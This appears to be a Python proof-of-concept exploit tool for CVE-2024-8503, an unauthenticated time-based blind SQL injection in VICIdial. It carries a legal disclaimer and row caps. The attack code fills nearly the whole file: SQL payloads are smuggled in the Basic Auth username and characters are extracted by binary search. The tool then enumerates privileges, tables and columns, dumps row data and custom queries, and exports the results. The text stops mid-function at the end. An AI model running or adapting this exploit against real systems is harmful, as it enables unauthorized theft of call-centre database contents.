README.md
Rendering markdown...
#!/usr/bin/env python3
"""
VICIdial CVE-2024-8503 Proof of Concept Tool
=============================================
Unauthenticated SQL Injection in VERM_AJAX_functions.php
LEGAL DISCLAIMER:
This tool is provided for authorized security testing and educational purposes only.
Unauthorized access to computer systems is illegal. Users must obtain explicit written
permission before testing any systems they do not own. The authors assume no liability
for misuse or damage caused by this tool.
Author: Machine-Farmer
CVE: CVE-2024-8503
Date: November 2024
"""
import argparse
import requests
import time
import base64
import statistics
import sys
import json
import csv
import os
import pickle
from datetime import datetime
from typing import Optional, Dict, List, Tuple
requests.packages.urllib3.disable_warnings()
# ============================================================================
# CONFIGURATION - STRICT LIMITS FOR SECURITY
# ============================================================================
VERSION = "1.0.1"
CHAR_MIN = 32
CHAR_MAX = 126
MAX_LENGTH = 250
MAX_CELL_LENGTH = 100
BASELINE_ITERS = 4
SLEEP_MULTIPLIER = 30
# Stricter limits for PoC security
DEFAULT_ROW_LIMIT = 10
MAX_ROW_LIMIT = 10
DEFAULT_COLUMN_LIMIT = 10
MAX_COLUMN_LIMIT = 10
DEFAULT_TABLE_LIMIT = 10
# Auto-extraction limits
AUTO_COLUMN_LIMIT = 10
AUTO_ROW_LIMIT = 10
METADATA_QUERIES = {
'db_version': '@@version',
'database': 'DATABASE()',
'db_user': 'CURRENT_USER()',
'hostname': '@@hostname',
'db_privileges': 'SELECT GROUP_CONCAT(privilege_type) FROM information_schema.user_privileges WHERE grantee LIKE CONCAT("%",SUBSTRING_INDEX(CURRENT_USER(),"@",1),"%") LIMIT 1',
'table_count': 'SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE()',
}
# ============================================================================
# STATE MANAGEMENT FOR RESUMABLE SCANS
# ============================================================================
class ScanState:
"""Manages scan state for resumable operations"""
def __init__(self, state_file: str = ".vicidial_scan_state.json"):
self.state_file = state_file
self.state = {
'target': None,
'completed_steps': [],
'metadata_results': {},
'tables_list': [],
'table_columns': {}, # table -> [columns]
'table_data': {}, # table -> {column -> [rows]}
'current_step': None,
'last_updated': None
}
self.load_state()
def load_state(self):
"""Load previous scan state if exists"""
if os.path.exists(self.state_file):
try:
with open(self.state_file, 'r', encoding='utf-8') as f:
self.state = json.load(f)
print(f"[+] Loaded previous scan state from {self.state_file}")
except Exception as e:
print(f"[!] Could not load state file: {e}")
elif os.path.exists(".vicidial_scan_state.pkl"):
print("[!] Legacy pickle state file found; ignoring for safety. Remove it if not needed.")
def save_state(self):
"""Save current scan state"""
self.state['last_updated'] = datetime.now().isoformat()
try:
with open(self.state_file, 'w', encoding='utf-8') as f:
json.dump(self.state, f, indent=2)
except Exception as e:
print(f"[!] Could not save state: {e}")
def clear_state(self):
"""Clear saved state"""
if os.path.exists(self.state_file):
os.remove(self.state_file)
self.state = {
'target': None,
'completed_steps': [],
'metadata_results': {},
'tables_list': [],
'table_columns': {},
'table_data': {},
'current_step': None,
'last_updated': None
}
def is_step_completed(self, step: str) -> bool:
"""Check if a step was already completed"""
return step in self.state['completed_steps']
def mark_step_completed(self, step: str):
"""Mark a step as completed"""
if step not in self.state['completed_steps']:
self.state['completed_steps'].append(step)
self.save_state()
def update_metadata(self, key: str, value: str):
"""Update metadata results"""
self.state['metadata_results'][key] = value
self.save_state()
def get_metadata(self, key: str) -> Optional[str]:
"""Get saved metadata"""
return self.state['metadata_results'].get(key)
def update_tables(self, tables: List[str]):
"""Update tables list"""
self.state['tables_list'] = tables
self.save_state()
def get_tables(self) -> List[str]:
"""Get saved tables"""
return self.state.get('tables_list', [])
def update_table_columns(self, table: str, columns: List[str]):
"""Update columns for a table"""
if 'table_columns' not in self.state:
self.state['table_columns'] = {}
self.state['table_columns'][table] = columns
self.save_state()
def get_table_columns(self, table: str) -> List[str]:
"""Get saved columns for table"""
return self.state.get('table_columns', {}).get(table, [])
def update_table_data(self, table: str, column: str, rows: List[str]):
"""Update row data for table/column"""
if 'table_data' not in self.state:
self.state['table_data'] = {}
if table not in self.state['table_data']:
self.state['table_data'][table] = {}
self.state['table_data'][table][column] = rows
self.save_state()
def get_table_data(self, table: str, column: str) -> List[str]:
"""Get saved row data for table/column"""
return self.state.get('table_data', {}).get(table, {}).get(column, [])
def set_target(self, target: str):
"""Set target URL"""
self.state['target'] = target
self.save_state()
def get_target(self) -> Optional[str]:
"""Get saved target"""
return self.state.get('target')
def show_resume_prompt(self) -> bool:
"""Show resume prompt and get user choice"""
if not self.state.get('target'):
return False
print("\n" + "="*70)
print("PREVIOUS SCAN DETECTED")
print("="*70)
print(f"Target: {self.state['target']}")
print(f"Last Updated: {self.state.get('last_updated', 'Unknown')}")
print(f"Completed Steps: {len(self.state['completed_steps'])}")
if self.state['completed_steps']:
for step in self.state['completed_steps']:
print(f" ✓ {step}")
print(f"Tables Found: {len(self.state.get('tables_list', []))}")
print(f"Tables with Columns: {len(self.state.get('table_columns', {}))}")
print("="*70)
choice = input("\nResume from previous scan? (y/n/clear): ").strip().lower()
if choice == 'clear':
self.clear_state()
print("[+] Scan state cleared. Starting fresh.")
return False
return choice == 'y'
# ============================================================================
# NOTIFICATION SYSTEM
# ============================================================================
def send_notification(title: str, message: str):
"""Send desktop notification when scan completes"""
try:
if sys.platform == 'darwin':
os.system(f"""osascript -e 'display notification "{message}" with title "{title}"'""")
elif sys.platform == 'linux':
os.system(f'notify-send "{title}" "{message}"')
elif sys.platform == 'win32':
try:
from win10toast import ToastNotifier
toaster = ToastNotifier()
toaster.show_toast(title, message, duration=10)
except ImportError:
print('\a')
else:
print('\a')
except Exception:
print('\a')
def play_completion_sound():
"""Play a sound when scan completes"""
try:
print('\a')
except Exception:
pass
# ============================================================================
# CORE EXPLOITATION ENGINE
# ============================================================================
class SQLInjectionEngine:
"""Core engine for time-based blind SQL injection"""
def __init__(self, target: str, params: dict, sleep_duration: int):
self.target = target
self.params = params
self.sleep_duration = sleep_duration
self.timing_threshold = sleep_duration * 0.8
@staticmethod
def make_auth_header(user: str, pwd: str = 'x') -> dict:
"""Create Basic Auth header with injected username"""
cred = f"{user}:{pwd}"
return {'Authorization': 'Basic ' + base64.b64encode(cred.encode()).decode()}
def probe(self, headers: dict, timeout: int = 30) -> Tuple[Optional[float], Optional[int]]:
"""Execute single HTTP probe and measure response time"""
try:
start = time.perf_counter()
r = requests.get(self.target, params=self.params, headers=headers,
verify=False, timeout=timeout)
elapsed = time.perf_counter() - start
return elapsed, r.status_code
except Exception:
return None, None
def test_condition(self, query: str, position: int, threshold: int) -> Optional[bool]:
"""Test if ASCII value at position is <= threshold"""
condition = f"ASCII(SUBSTRING(({query}),{position},1))<={threshold}"
inner_query = f"SELECT IF({condition},sleep({self.sleep_duration}),NULL)"
payload = f"goolicker', '', ({inner_query}));#:"
headers = {'User-Agent': 'KoreLogic-Test', **self.make_auth_header(payload)}
elapsed, _ = self.probe(headers)
if elapsed is None:
return None
return elapsed >= self.timing_threshold
def extract_character(self, query: str, position: int, max_retries: int = 3) -> Optional[str]:
"""Extract single character at position using binary search with retry logic"""
for attempt in range(max_retries):
try:
exists = self.test_condition(query, position, CHAR_MIN - 1)
if exists is None:
if attempt < max_retries - 1:
print(f"\n[!] Network error at position {position}, retry {attempt + 1}/{max_retries}...")
time.sleep(2)
continue
raise RuntimeError(f"Network error at position {position} after {max_retries} retries")
if exists:
return None
low, high = CHAR_MIN, CHAR_MAX
char_ord = None
while low <= high:
mid = (low + high) // 2
is_lte = self.test_condition(query, position, mid)
if is_lte is None:
if attempt < max_retries - 1:
print(f"\n[!] Network error during binary search, retry {attempt + 1}/{max_retries}...")
time.sleep(2)
break
raise RuntimeError(f"Network error at position {position} after {max_retries} retries")
if is_lte:
char_ord = mid
high = mid - 1
else:
low = mid + 1
if char_ord is None:
if attempt < max_retries - 1:
continue
return None
current = self.test_condition(query, position, char_ord)
previous = self.test_condition(query, position, char_ord - 1)
if current and not previous:
return chr(char_ord)
for ordinal in range(max(CHAR_MIN, char_ord - 2), min(CHAR_MAX, char_ord + 2) + 1):
curr = self.test_condition(query, position, ordinal)
prev = self.test_condition(query, position, ordinal - 1)
if curr and not prev:
return chr(ordinal)
return None
except RuntimeError as e:
if attempt < max_retries - 1:
print(f"\n[!] Error: {e}, retry {attempt + 1}/{max_retries}...")
time.sleep(2)
continue
raise
return None
def extract_string(self, query: str, maxlen: int = MAX_LENGTH,
show_progress: bool = True) -> str:
"""Extract complete string from SQL query result"""
result = []
for pos in range(1, maxlen + 1):
char = self.extract_character(query, pos)
if char is None:
break
result.append(char)
if show_progress:
sys.stdout.write(char)
sys.stdout.flush()
return ''.join(result)
# ============================================================================
# VULNERABILITY SCANNER
# ============================================================================
class VulnerabilityScanner:
"""Main scanner for CVE-2024-8503"""
def __init__(self, url: str, path: str):
self.target = url.rstrip('/') + path
self.params = {'function': 'log_custom_report'}
self.engine = None
self.baseline_avg = 0.0
self.sleep_duration = 0
def calibrate_timing(self, iterations: int = BASELINE_ITERS) -> bool:
"""Calibrate baseline timing and determine sleep duration"""
print("[*] Calibrating timing baseline...")
baseline_times = []
for i in range(iterations):
try:
start = time.perf_counter()
response = requests.get(self.target, params=self.params,
headers={'User-Agent': 'KoreLogic-Test'},
verify=False, timeout=30)
elapsed = time.perf_counter() - start
baseline_times.append(elapsed)
print(f" Attempt {i+1}/{iterations}: {elapsed:.3f}s (Status: {response.status_code})")
time.sleep(0.25)
except requests.exceptions.Timeout:
print(f"[-] Timeout on attempt {i+1}/{iterations}")
if i < iterations - 1:
print(" Retrying...")
continue
else:
print("[-] Too many timeouts during calibration")
return False
except requests.exceptions.ConnectionError as e:
print(f"[-] Connection error on attempt {i+1}/{iterations}: {e}")
if i < iterations - 1:
print(" Retrying...")
time.sleep(1)
continue
else:
print("[-] Could not connect to target")
return False
except Exception as e:
print(f"[-] Unexpected error during calibration: {e}")
return False
if not baseline_times:
print("[-] No successful calibration attempts")
return False
self.baseline_avg = statistics.mean(baseline_times)
self.sleep_duration = max(2, round(self.baseline_avg * SLEEP_MULTIPLIER))
print(f"[+] Baseline: {self.baseline_avg:.3f}s | Sleep: {self.sleep_duration}s")
return True
def verify_vulnerability(self) -> bool:
"""Verify target is vulnerable"""
print("[*] Testing vulnerability...")
inj_user = f"', '', sleep({self.sleep_duration}));#:"
headers = {
'User-Agent': 'KoreLogic-Test',
**SQLInjectionEngine.make_auth_header(inj_user)
}
try:
start = time.perf_counter()
requests.get(self.target, params=self.params, headers=headers,
verify=False, timeout=self.sleep_duration + 10)
elapsed = time.perf_counter() - start
if elapsed >= (self.sleep_duration * 0.8):
print(f"[+] Vulnerability CONFIRMED (delay: {elapsed:.3f}s)")
return True
else:
print(f"[-] Vulnerability NOT detected (delay: {elapsed:.3f}s)")
return False
except Exception as e:
print(f"[-] Error during verification: {e}")
return False
def initialize(self, skip_vuln_check: bool = False) -> bool:
"""Initialize scanner and verify vulnerability"""
if not self.calibrate_timing():
return False
if not skip_vuln_check:
if not self.verify_vulnerability():
return False
self.engine = SQLInjectionEngine(self.target, self.params, self.sleep_duration)
return True
def extract_metadata(self, query_name: str, query: str) -> Optional[str]:
"""Extract metadata using SQL query"""
if not self.engine:
return None
full_query = query if query.startswith('SELECT') else f"SELECT {query}"
try:
print(f"\n[+] Extracting: {query_name}")
print(f" Query: {query}")
sys.stdout.write(f" Value: ")
sys.stdout.flush()
result = self.engine.extract_string(full_query)
print(f"\n Result: {repr(result)}")
return result
except RuntimeError as e:
print(f"\n ERROR: {e}")
return None
def list_tables(self, limit: int = DEFAULT_TABLE_LIMIT) -> List[str]:
"""List table names from database"""
limit = min(max(limit, 1), DEFAULT_TABLE_LIMIT)
query = (
"SELECT GROUP_CONCAT(table_name SEPARATOR ',') "
"FROM (SELECT table_name FROM information_schema.tables "
"WHERE table_schema=DATABASE() ORDER BY table_name LIMIT {limit}) AS tbls"
).format(limit=limit)
print(f"\n[+] Listing tables (limit: {limit})...")
sys.stdout.write(" Tables: ")
sys.stdout.flush()
try:
tables_str = self.engine.extract_string(query)
print("\n")
if not tables_str:
return []
return tables_str.split(',')
except RuntimeError as e:
print(f"\n ERROR: {e}")
return []
def get_table_columns(self, table: str, limit: int = DEFAULT_COLUMN_LIMIT) -> List[str]:
"""Get column names for a table"""
if limit > MAX_COLUMN_LIMIT:
print(f" [!] Limit capped at {MAX_COLUMN_LIMIT} columns for PoC")
limit = MAX_COLUMN_LIMIT
query = f"SELECT GROUP_CONCAT(column_name SEPARATOR ',') FROM (SELECT column_name FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='{table}' LIMIT {limit}) AS cols"
print(f"\n[+] Getting columns for table: {table} (limit: {limit})")
sys.stdout.write(" Columns: ")
sys.stdout.flush()
try:
cols_str = self.engine.extract_string(query)
print("\n")
if not cols_str:
return []
return cols_str.split(',')
except RuntimeError as e:
print(f"\n ERROR: {e}")
return []
def extract_table_data(self, table: str, columns: List[str],
limit: int = DEFAULT_ROW_LIMIT, start_position: int = 0) -> List[Dict[str, str]]:
"""Extract data from table with improved error handling"""
if limit > MAX_ROW_LIMIT:
print(f" [!] Row limit capped at {MAX_ROW_LIMIT} for PoC")
limit = MAX_ROW_LIMIT
print(f"\n[+] Extracting data from: {table}")
print(f" Columns: {', '.join(columns)}")
print(f" Starting from row: {start_position + 1}")
print(f" Rows to extract: {limit}\n")
results = []
consecutive_errors = 0
max_consecutive_errors = 3
for offset in range(limit):
row_num = start_position + offset
print(f"[Row {row_num + 1} (offset {offset + 1}/{limit})]")
row_data = {}
row_has_data = False
for col in columns:
query = f"SELECT {col} FROM {table} LIMIT {row_num},1"
sys.stdout.write(f" {col:.<25} ")
sys.stdout.flush()
try:
value = self.engine.extract_string(query, maxlen=MAX_CELL_LENGTH, show_progress=False)
row_data[col] = value if value else "NULL"
if value:
row_has_data = True
print(value if value else "NULL")
consecutive_errors = 0 # Reset error counter on success
except RuntimeError as e:
print(f"ERROR: {str(e)[:50]}")
row_data[col] = "ERROR"
consecutive_errors += 1
if consecutive_errors >= max_consecutive_errors:
print(f"\n[!] Too many consecutive errors ({consecutive_errors}), stopping extraction")
print(f"[!] Successfully extracted {len(results)} rows before errors")
return results
except KeyboardInterrupt:
print("\n[!] Extraction interrupted by user")
print(f"[!] Partial results: {len(results)} rows extracted")
return results
except Exception as e:
print(f"UNEXPECTED ERROR: {str(e)[:50]}")
row_data[col] = "ERROR"
consecutive_errors += 1
if consecutive_errors >= max_consecutive_errors:
print(f"\n[!] Too many consecutive errors, stopping extraction")
return results
# Only add row if it has some actual data
if row_has_data or any(v not in ["NULL", "ERROR"] for v in row_data.values()):
results.append(row_data)
else:
print(f" [!] Row {row_num + 1} appears empty, may have reached end of table")
# If we get an empty row, we might be past the end of the table
# if row_num > start_position: # Don't stop if it's the first row at new position
# break
print()
return results
def auto_extract_table(self, table: str) -> Tuple[List[str], List[Dict[str, str]]]:
"""Automatically discover columns and extract data from table"""
print(f"\n[+] Auto-extracting from table: {table}")
print(f" Step 1: Discovering columns (limit: {AUTO_COLUMN_LIMIT})...")
columns = self.get_table_columns(table, AUTO_COLUMN_LIMIT)
if not columns:
print("[-] No columns found")
return [], []
print(f" Found {len(columns)} columns: {', '.join(columns)}")
print(f" Step 2: Extracting data (limit: {AUTO_ROW_LIMIT} rows)...\n")
data = self.extract_table_data(table, columns, AUTO_ROW_LIMIT)
return columns, data
# ============================================================================
# OUTPUT FORMATTERS
# ============================================================================
class OutputFormatter:
"""Format and display extraction results"""
@staticmethod
def print_banner():
"""Print tool banner"""
banner = """
╔═══════════════════════════════════════════════════════════════════════╗
║ ║
║ VICIdial CVE-2024-8503 Proof of Concept Tool ║
║ Unauthenticated SQL Injection Exploit ║
║ ║
║ Version: 1.0.1 (Secure Edition) ║
║ Author: Machine-Farmer ║
║ For Authorized Security Testing Only ║
║ ║
╚═══════════════════════════════════════════════════════════════════════╝
"""
print(banner)
@staticmethod
def print_metadata_summary(results: Dict[str, str]):
"""Print metadata extraction summary"""
print("\n" + "="*70)
print("METADATA EXTRACTION SUMMARY")
print("="*70)
for key, value in results.items():
label = key.replace('_', ' ').title()
if key == 'table_names' and value and value != 'ERROR':
print(f"{label}:")
for idx, tbl in enumerate(value.split(',')[:15], 1):
print(f" {idx:2d}. {tbl}")
else:
display_val = value[:60] + "..." if len(value) > 60 else value
print(f" {label:.<25} {display_val}")
print("="*70)
@staticmethod
def print_table_list(tables: List[str]):
"""Print list of tables"""
print("\n" + "="*70)
print(f"TABLES FOUND: {len(tables)}")
print("="*70)
for idx, table in enumerate(tables, 1):
print(f" {idx:2d}. {table}")
print("="*70)
@staticmethod
def print_columns_list(table: str, columns: List[str]):
"""Print list of columns"""
print("\n" + "="*70)
print(f"COLUMNS IN TABLE: {table}")
print("="*70)
for idx, col in enumerate(columns, 1):
print(f" {idx:2d}. {col}")
print("="*70)
@staticmethod
def print_table_data(table: str, columns: List[str], data: List[Dict[str, str]]):
"""Print extracted table data"""
if not data:
print("[-] No data extracted")
return
widths = {col: max(len(col), 10) for col in columns}
for row in data:
for col in columns:
value = str(row.get(col, ''))
widths[col] = max(widths[col], min(len(value), 50))
total_width = sum(widths.values()) + len(columns) * 3 + 1
print("\n" + "="*total_width)
print(f"DATA FROM TABLE: {table}".center(total_width))
print("="*total_width)
header = " | ".join(col.ljust(widths[col]) for col in columns)
print(f"| {header} |")
print("="*total_width)
for row in data:
row_values = []
for col in columns:
value = str(row.get(col, 'N/A'))
if len(value) > widths[col]:
value = value[:widths[col]-3] + "..."
row_values.append(value.ljust(widths[col]))
row_str = " | ".join(row_values)
print(f"| {row_str} |")
print("="*total_width)
print(f"\nTotal rows: {len(data)}\n")
@staticmethod
def export_json(data: dict, filename: str):
"""Export results to JSON"""
with open(filename, 'w') as f:
json.dump(data, f, indent=2)
print(f"[+] Results exported to: {filename}")
@staticmethod
def export_csv(columns: List[str], data: List[Dict[str, str]], filename: str):
"""Export table data to CSV"""
with open(filename, 'w', newline='') as f:
writer = csv.DictWriter(f, fieldnames=columns)
writer.writeheader()
writer.writerows(data)
print(f"[+] Data exported to: {filename}")
# ============================================================================
# INTERACTIVE MODE
# ============================================================================
class InteractiveMode:
"""Interactive menu-driven interface"""
def __init__(self, scanner: VulnerabilityScanner, scan_state: Optional[ScanState] = None):
self.scanner = scanner
self.scan_state = scan_state if scan_state else ScanState()
self.metadata_queries = METADATA_QUERIES
def show_main_menu(self):
"""Display main menu"""
print("\n" + "="*70)
print("MAIN MENU")
print("="*70)
print(" 1. Extract Metadata")
print(" 2. List Tables")
print(" 3. Get Table Columns")
print(" 4. Extract Table Data (Manual)")
print(" 5. Auto-Extract Table Data (Discover + Extract)")
print(" 6. Custom Query")
print(" 7. Extract All (Full Scan - Resumable)")
print(" 8. View Scan State")
print(" 9. Clear Scan State")
print(" 0. Exit")
print("="*70)
def show_metadata_menu(self):
"""Display metadata extraction menu"""
print("\n" + "="*70)
print("METADATA EXTRACTION")
print("="*70)
print(" 1. Database Version")
print(" 2. Database Name")
print(" 3. Database User")
print(" 4. Hostname")
print(" 5. User Privileges")
print(" 6. Table Count")
print(" 7. Extract All Metadata")
print(" 0. Back to Main Menu")
print("="*70)
def extract_metadata_interactive(self):
"""Interactive metadata extraction"""
while True:
self.show_metadata_menu()
choice = input("\nSelect option: ").strip()
if choice == '0':
break
elif choice == '1':
result = self.scanner.extract_metadata('Database Version', self.metadata_queries['db_version'])
if result:
self.scan_state.update_metadata('db_version', result)
elif choice == '2':
result = self.scanner.extract_metadata('Database Name', self.metadata_queries['database'])
if result:
self.scan_state.update_metadata('database', result)
elif choice == '3':
result = self.scanner.extract_metadata('Database User', self.metadata_queries['db_user'])
if result:
self.scan_state.update_metadata('db_user', result)
elif choice == '4':
result = self.scanner.extract_metadata('Hostname', self.metadata_queries['hostname'])
if result:
self.scan_state.update_metadata('hostname', result)
elif choice == '5':
result = self.scanner.extract_metadata('User Privileges', self.metadata_queries['db_privileges'])
if result:
self.scan_state.update_metadata('db_privileges', result)
elif choice == '6':
result = self.scanner.extract_metadata('Table Count', self.metadata_queries['table_count'])
if result:
self.scan_state.update_metadata('table_count', result)
elif choice == '7':
results = {}
for name, query in self.metadata_queries.items():
result = self.scanner.extract_metadata(name, query)
if result:
results[name] = result
self.scan_state.update_metadata(name, result)
OutputFormatter.print_metadata_summary(results)
else:
print("[-] Invalid option")
def list_tables_interactive(self):
"""Interactive table listing"""
print(f"\n[+] Listing tables (limit: {DEFAULT_TABLE_LIMIT})...")
tables = self.scanner.list_tables()
if tables:
self.scan_state.update_tables(tables)
OutputFormatter.print_table_list(tables)
def get_columns_interactive(self):
"""Interactive column discovery"""
table = input("\nEnter table name: ").strip()
if not table:
print("[-] Table name required")
return
limit_input = input(f"Number of columns to retrieve (max {MAX_COLUMN_LIMIT}) [{DEFAULT_COLUMN_LIMIT}]: ").strip()
limit = int(limit_input) if limit_input else DEFAULT_COLUMN_LIMIT
columns = self.scanner.get_table_columns(table, limit)
if columns:
self.scan_state.update_table_columns(table, columns)
OutputFormatter.print_columns_list(table, columns)
def extract_data_interactive(self):
"""Interactive data extraction"""
table = input("\nEnter table name: ").strip()
if not table:
print("[-] Table name required")
return
columns_str = input("Enter column names (comma-separated): ").strip()
if not columns_str:
print("[-] Column names required")
return
columns = [c.strip() for c in columns_str.split(',')]
limit_input = input(f"Number of rows to extract (max {MAX_ROW_LIMIT}) [{DEFAULT_ROW_LIMIT}]: ").strip()
limit = int(limit_input) if limit_input else DEFAULT_ROW_LIMIT
data = self.scanner.extract_table_data(table, columns, limit)
OutputFormatter.print_table_data(table, columns, data)
export = input("\nExport to CSV? (y/n): ").strip().lower()
if export == 'y':
filename = f"{table}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.csv"
OutputFormatter.export_csv(columns, data, filename)
def auto_extract_interactive(self):
"""Interactive auto-extraction"""
table = input("\nEnter table name: ").strip()
if not table:
print("[-] Table name required")
return
columns, data = self.scanner.auto_extract_table(table)
if columns:
self.scan_state.update_table_columns(table, columns)
OutputFormatter.print_table_data(table, columns, data)
export = input("\nExport to CSV? (y/n): ").strip().lower()
if export == 'y':
filename = f"{table}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.csv"
OutputFormatter.export_csv(columns, data, filename)
def custom_query_interactive(self):
"""Execute custom SQL query"""
print("\n[!] Enter SQL query (SELECT only, no modifications)")
query = input("Query: ").strip()
if not query:
print("[-] Query required")
return
if not query.upper().startswith('SELECT'):
query = f"SELECT {query}"
print(f"\n[+] Executing: {query}")
sys.stdout.write("[+] Result: ")
sys.stdout.flush()
try:
result = self.scanner.engine.extract_string(query)
print(f"\n[+] {repr(result)}")
except Exception as e:
print(f"\n[-] Error: {e}")
def view_scan_state(self):
"""View current scan state"""
print("\n" + "="*70)
print("CURRENT SCAN STATE")
print("="*70)
print(f"Target: {self.scan_state.get_target()}")
print(f"Last Updated: {self.scan_state.state.get('last_updated', 'Never')}")
print(f"\nCompleted Steps: {len(self.scan_state.state['completed_steps'])}")
for step in self.scan_state.state['completed_steps']:
print(f" ✓ {step}")
print(f"\nMetadata Collected: {len(self.scan_state.state['metadata_results'])}")
for key, val in self.scan_state.state['metadata_results'].items():
print(f" • {key}: {val[:50]}...")
print(f"\nTables Found: {len(self.scan_state.get_tables())}")
print(f"Tables with Columns: {len(self.scan_state.state.get('table_columns', {}))}")
print("="*70)
def clear_scan_state_menu(self):
"""Clear scan state with confirmation"""
confirm = input("\nAre you sure you want to clear all scan state? (yes/no): ").strip().lower()
if confirm == 'yes':
self.scan_state.clear_state()
print("[+] Scan state cleared successfully")
else:
print("[+] Clear operation cancelled")
def full_scan(self):
"""Perform comprehensive full scan with resumability"""
print("\n" + "="*70)
print("FULL SCAN - COMPREHENSIVE DATA EXTRACTION")
print("="*70)
print(f"This will extract:")
print(f" • All metadata")
print(f" • Tables (up to {DEFAULT_TABLE_LIMIT})")
print(f" • Columns for each table (up to {MAX_COLUMN_LIMIT} per table)")
print(f" • Rows for each column (up to {MAX_ROW_LIMIT} per table)")
print(f"\n[!] This operation is RESUMABLE - progress is saved automatically")
print("="*70)
confirm = input("\nProceed with full scan? (y/n): ").strip().lower()
if confirm != 'y':
print("[+] Full scan cancelled")
return
self.scan_state.set_target(self.scanner.target)
all_results = {
'timestamp': datetime.now().isoformat(),
'target': self.scanner.target,
'metadata': {},
'tables': {}
}
# Step 1: Extract metadata
if not self.scan_state.is_step_completed('metadata'):
print("\n[STEP 1/3] Extracting metadata...")
for name, query in self.metadata_queries.items():
cached = self.scan_state.get_metadata(name)
if cached:
print(f"[+] Using cached {name}: {cached}")
all_results['metadata'][name] = cached
else:
result = self.scanner.extract_metadata(name, query)
if result:
self.scan_state.update_metadata(name, result)
all_results['metadata'][name] = result
self.scan_state.mark_step_completed('metadata')
OutputFormatter.print_metadata_summary(all_results['metadata'])
else:
print("\n[STEP 1/3] Metadata already extracted (resuming)")
all_results['metadata'] = self.scan_state.state['metadata_results']
# Step 2: List all tables
if not self.scan_state.is_step_completed('tables'):
print("\n[STEP 2/3] Listing all tables...")
tables = self.scanner.list_tables(DEFAULT_TABLE_LIMIT)
if tables:
self.scan_state.update_tables(tables)
OutputFormatter.print_table_list(tables)
self.scan_state.mark_step_completed('tables')
else:
print("\n[STEP 2/3] Tables already listed (resuming)")
tables = self.scan_state.get_tables()
print(f"[+] Using cached {len(tables)} tables")
# Step 3: Extract columns and data for each table
print(f"\n[STEP 3/3] Extracting data from {len(tables)} tables...")
print(f"[!] Limit: {MAX_COLUMN_LIMIT} columns, {MAX_ROW_LIMIT} rows per table")
for idx, table in enumerate(tables, 1):
print(f"\n{'='*70}")
print(f"Processing Table {idx}/{len(tables)}: {table}")
print(f"{'='*70}")
# Check if columns already extracted
cached_columns = self.scan_state.get_table_columns(table)
if cached_columns:
print(f"[+] Using cached columns for {table}: {cached_columns}")
columns = cached_columns
else:
columns = self.scanner.get_table_columns(table, MAX_COLUMN_LIMIT)
if columns:
self.scan_state.update_table_columns(table, columns)
if not columns:
print(f"[-] No columns found for {table}, skipping...")
continue
# Extract data
data = self.scanner.extract_table_data(table, columns, MAX_ROW_LIMIT)
if data:
all_results['tables'][table] = {
'columns': columns,
'rows': data
}
OutputFormatter.print_table_data(table, columns, data)
# Export final results
filename = f"full_scan_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
OutputFormatter.export_json(all_results, filename)
print("\n" + "="*70)
print("FULL SCAN COMPLETE")
print("="*70)
print(f"[+] Metadata items: {len(all_results['metadata'])}")
print(f"[+] Tables processed: {len(all_results['tables'])}")
print(f"[+] Results saved to: {filename}")
print("="*70)
def run(self):
"""Run interactive mode"""
while True:
self.show_main_menu()
choice = input("\nSelect option: ").strip()
if choice == '0':
print("\n[+] Exiting...")
break
elif choice == '1':
self.extract_metadata_interactive()
elif choice == '2':
self.list_tables_interactive()
elif choice == '3':
self.get_columns_interactive()
elif choice == '4':
self.extract_data_interactive()
elif choice == '5':
self.auto_extract_interactive()
elif choice == '6':
self.custom_query_interactive()
elif choice == '7':
self.full_scan()
elif choice == '8':
self.view_scan_state()
elif choice == '9':
self.clear_scan_state_menu()
else:
print("[-] Invalid option")
# ============================================================================
# COMMAND LINE INTERFACE
# ============================================================================
def parse_arguments():
"""Parse command line arguments"""
parser = argparse.ArgumentParser(
description='VICIdial CVE-2024-8503 Proof of Concept Tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog='''
Examples:
# Interactive mode
%(prog)s --url https://target.com --interactive
# Extract metadata
%(prog)s --url https://target.com --metadata db_version database db_user
# List tables
%(prog)s --url https://target.com --list-tables
# Get columns
%(prog)s --url https://target.com --get-columns call_log
# Extract table data
%(prog)s --url https://target.com --table call_log --columns uniqueid,channel --rows 3
# Auto-extract table data
%(prog)s --url https://target.com --auto-extract call_log
# Full scan (resumable)
%(prog)s --url https://target.com --full-scan
# Self-check (no network activity)
%(prog)s --self-check
LEGAL NOTICE:
This tool is for authorized security testing only. Unauthorized access
to computer systems is illegal. Obtain written permission before testing.
'''
)
parser.add_argument('--url', help='Target URL')
parser.add_argument('--path', default='/VERM/VERM_AJAX_functions.php', help='Path to vulnerable endpoint')
parser.add_argument('--interactive', action='store_true', help='Run in interactive mode')
parser.add_argument('--metadata', nargs='+',
choices=['db_version', 'database', 'db_user', 'hostname',
'db_privileges', 'table_count', 'all'],
help='Extract metadata')
parser.add_argument('--list-tables', action='store_true', help='List database tables')
parser.add_argument('--get-columns', metavar='TABLE', help='Get columns for table')
parser.add_argument('--column-limit', type=int, default=DEFAULT_COLUMN_LIMIT,
help=f'Number of columns (max {MAX_COLUMN_LIMIT}, default: {DEFAULT_COLUMN_LIMIT})')
parser.add_argument('--table', help='Table to extract data from')
parser.add_argument('--columns', help='Comma-separated column names')
parser.add_argument('--rows', type=int, default=DEFAULT_ROW_LIMIT,
help=f'Number of rows (max {MAX_ROW_LIMIT}, default: {DEFAULT_ROW_LIMIT})')
parser.add_argument('--auto-extract', metavar='TABLE', help='Auto-extract table data')
parser.add_argument('--custom-query', help='Execute custom SQL query')
parser.add_argument('--full-scan', action='store_true', help='Perform full scan (resumable)')
parser.add_argument('--skip-vuln-check', action='store_true', help='Skip vulnerability verification')
parser.add_argument('--export', help='Export results to file')
parser.add_argument('--self-check', action='store_true', help='Print configuration and exit (no network)')
return parser.parse_args()
def run_self_check():
"""Print configuration and exit without any network activity"""
print("\n[+] Self-check (no network activity)")
print(f"[+] Version: {VERSION}")
print(f"[+] Limits: Tables={DEFAULT_TABLE_LIMIT}, Columns={MAX_COLUMN_LIMIT}, Rows={MAX_ROW_LIMIT}")
print(f"[+] Max metadata length: {MAX_LENGTH}")
print(f"[+] Max cell length: {MAX_CELL_LENGTH}")
print(f"[+] State file: .vicidial_scan_state.json")
